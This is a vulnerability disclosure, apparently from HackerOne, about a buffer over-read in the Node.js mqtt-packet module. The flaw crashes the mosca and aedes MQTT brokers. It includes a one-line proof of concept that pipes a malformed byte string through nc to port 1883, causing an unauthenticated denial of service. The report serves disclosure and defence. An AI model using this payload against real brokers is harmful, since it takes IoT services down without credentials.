Node.js third-party modules: A specifically malformed MQTT Subscribe packet crashes MQTT Brokers using the mqtt-packet module for decoding

2019-04-1715:00:31

lxndr

hackerone.com

EPSS

0.001

Percentile

40.6%

JSON

I would like to report a buffer over-read in mqtt-packet respectively BufferList module.
It allows triggering an out of range read on a buffer which throws a RangeError. MQTT Brokers like mosca and aedes using this module can be forced to crash by sending a specifically malformed MQTT Subscribe packet.

Module

module name: mqtt-packetversion:6.1.1npm page: https://www.npmjs.com/package/mqtt-packet

Module Description

Encode and Decode MQTT 3.1.1, 5.0 packets the node way.

Module Stats

114,635 weekly downloads

Vulnerability

Vulnerability Description

From the original E-Mail to the Author:
Hey Matteo,
while playing around with mosca/aedes and our fuzzing approach from IoT-Testware, I discovered some flaws which cause mosca/aedes to crash. Though, I assume the reasons originate from the mqtt-packet respectively bl modules.
I didn’t open an issue because the issue is IMHO quite critical. One could try to abuse to crash mosca/aedes without requiring any credentials, thus might lead to easy DoS attacks.
The malformed Subscribe Packet crashes mosca (v2.8.3) and aedes (v0.37.0), no valid credentials required.

Steps To Reproduce:

> Detailed steps to reproduce with all required references/steps/commands. If there is any exploit code or reference to the package source code this is the place where it should be put.

start either mosca or aedes MQTT Broker
shoot the following command against the Broker (on localhost)

echo -ne '\x104\x00\x04MQTT\x04\xc2\x00\xff\x00\x19alicedoesnotneedaclientid\x00\x05alice\x00\x06secret\x82\x19\xa5\xa6\x00\x15hello/topic/of/alice\x00' | nc localhost 1883
the sent byte string contains 2 accumulated MQTT Packets. The second packet is a subscribe packet and is processed in any case and the Broker’s Auth mechanisms are undermined.